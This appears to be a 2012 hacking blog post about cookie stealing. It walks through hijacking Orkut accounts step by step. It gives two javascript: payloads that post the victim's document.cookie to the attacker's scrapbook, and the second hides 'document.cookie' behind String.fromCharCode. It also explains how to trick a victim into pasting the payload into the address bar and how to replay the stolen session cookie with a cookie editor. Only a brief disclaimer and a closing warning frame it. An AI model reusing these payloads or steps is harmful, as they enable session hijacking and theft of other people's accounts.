Pages

What is Cookie Stealing? How it is used for hacking

Saturday, November 10, 2012    


Cookie Stealing is a hacking method used to hack gmail or social networking account.Orkut was a big victim of this kind of attacks.






 What is a cookie?.

A cookie, Also known as an HTTP cookie, web cookie, or browser cookie, is usually a small piece of data sent from a website and stored on the web browser while  the user is browsing a website. When the user browses the same website in the future, the data stored in the cookie can be retrieved by the website to notify the website of the user's previous activity.

But Cookies may contain vital information for hackers to hack your account.

How cookie stealing is done?

Let us look at this with an example.

I am giving you an example of hacking an Orkut account using cookie stealing.Which was very common when Orkut was famous.

This is Only for learning purpose.Use this only to understand the concept of cookie stealing.Don’t use this technique to hack any email or social networking account or for any criminal activities.

Example of a cookie script.

javascript:nobody=replyForm;nobody.toUserId.value=33444211;
nobody.scrapText.value=document.cookie;nobody.action=’scrapbook.aspx?
Action.submit’;nobody.submit()

First the hacker changes the userid.value to his user id. userid can be obtained by right clicking and selecting properties of any Orkut album photo.

javascript:nobody=replyForm;nobody.toUserId.value=yournumber;
nobody.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));
nobody.action=’Scrapbook.aspx?Action.writeScrapBasic;nobody.submit()

Now the hacker send this script to the victim and ask him to paste in the address bar and press enter.If he does that  the victim's cookie will be in hacker’s scrap book.

Now what He does is .He goes to his Orkut home page and click tools-àcookie editor click filter and look for Orkut.state cookie.Double clicks and changes Orkut.state part with Victim’s script.

Then he puts his  eight digit number in place  of  33444211.

That's it then logout and login Orkut again and what Hacker sees is the victim’s Orkut home page.

So remember if you have any account never use suspicious scripts like this from others which will result in your account get hacked.Make sure that Your PC is protected with updated security software.